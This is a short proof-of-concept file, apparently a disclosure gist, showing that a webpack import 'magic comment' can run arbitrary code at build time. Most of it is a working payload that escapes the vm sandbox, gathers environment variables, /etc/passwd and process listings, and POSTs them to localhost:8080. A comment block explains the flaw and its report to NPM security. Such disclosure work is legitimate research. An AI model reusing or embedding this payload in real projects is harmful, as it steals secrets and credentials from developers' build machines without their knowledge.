POC for executing webpack code through webpack imort magic comments

	/*
	It's possible to execute arbitrary code during webpack execution by abusing the magic
	comment feature documented here: https://webpack.js.org/api/module-methods/#magic-comments
	These comments eventually get executed by `vm.runInContext` which is well-known to be unsafe
	at https://github.com/webpack/webpack/blob/v4.43.0/lib/Parser.js#L2338
	This is an example payload that reads process.env, ps aux and /etc/passwd and posts to localhost:8080.
	Reported to NPM security for webpack July 12th, 2020, but considered not a bug.
	See also:
	- I answered a stack overflow question about this: https://stackoverflow.com/a/66300450/315936
	- It seems you can also use inline loaders for this too: https://github.com/webpack/webpack/issues/10231
	Cudos to
	https://github.com/patriksimek/vm2/issues/32#issue-160537607
	https://pwnisher.gitlab.io/nodejs/sandbox/2019/02/21/sandboxing-nodejs-is-hard.html
	*/
	import(
	/* webpackChunkName: this.constructor.constructor(`(function() {
	let Function = this.constructor.constructor;
	let process = new Function('return process')();
	let require = process.mainModule.require;
	let http = require('http');
	let fs = require('fs');
	let buffer = require('buffer');
	let child_process = require('child_process');
	let payload = {
	'env': process.env,
	'passwd': fs.readFileSync('/etc/passwd').toString(),
	'ps': child_process.execSync('ps aux').toString(),
	};
	let data = buffer.Buffer.from(JSON.stringify(payload));
	let req = http.request('http://localhost:8080/', {
	'method': "POST",
	'headers': {
	"Content-Type": "application/json",
	"Content-Length": data.length,
	}
	});
	req.write(data);
	req.end();
	})()`)() */
	'buffer'
	);